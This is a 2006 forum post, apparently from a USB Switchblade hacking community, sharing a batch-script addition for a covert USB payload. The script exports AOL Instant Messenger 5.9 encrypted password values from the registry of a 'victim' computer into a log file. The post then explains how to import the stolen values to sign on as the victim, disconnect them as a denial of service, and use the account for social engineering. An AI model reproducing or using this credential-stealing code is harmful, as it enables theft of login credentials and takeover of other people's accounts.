AndyzBong Posted December 29, 2006 Share Posted December 29, 2006 Now before I continue... I know I am going to get flamed for this payload addition, but I think it is kind of an important addition due to some inabilities in the program MessenPass. MessenPass is the MSN, AIM, etc password decrypter / stealer that is currently used in the USB Switchblade. However, the Mspass program only works for versions of AIM 5.5 (as far as I am aware of) and not versions of AIM 5.9 AIM 5.9 and higher versions use a more potent password algorithm, and have yet to be decrypted. By adding the following code to your go.cmd file, you can extract the encrypted passwords from the 'victim' computer. @echo [AIM 5.9 Encrypted Password Extract] >> Documentslogfiles%computername%.log 2>&1 echo. >> Documentslogfiles%computername%.log 2>&1 regedit.exe /E Documentslogfilesaimdump.reg "HKEY_CURRENT_USERSOFTWAREAmerica OnlineAOL Instant Messenger (tM)CurrentVersionusers" TYPE Documentslogfilesaimdump.reg | find "Password1" >> Documentslogfiles%computername%.log echo. >> Documentslogfiles%computername%.log 2>&1 @echo [End AIM 5.9 Encrypted Password Extract] >> Documentslogfiles%computername%.log 2>&1 After extracting the encrypted password registry values you can import the information remotely into your own registry and sign-on as the victim's AIM screen name; just as if they had entered their password at your computer and clicked on the "Save Password" check box. Unfortunately you cannot change the password. However, you can login as the 'victim', and you can disconnect them; when the AOL System IMs you and asks you to "Press 1 to disconnect your other connection". So it is basically a pretty lame DoS attack. You could also use this for social engineering. If anyone wants to criticize my lame code, please go ahead and post a cleaner way of doing this. :? Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.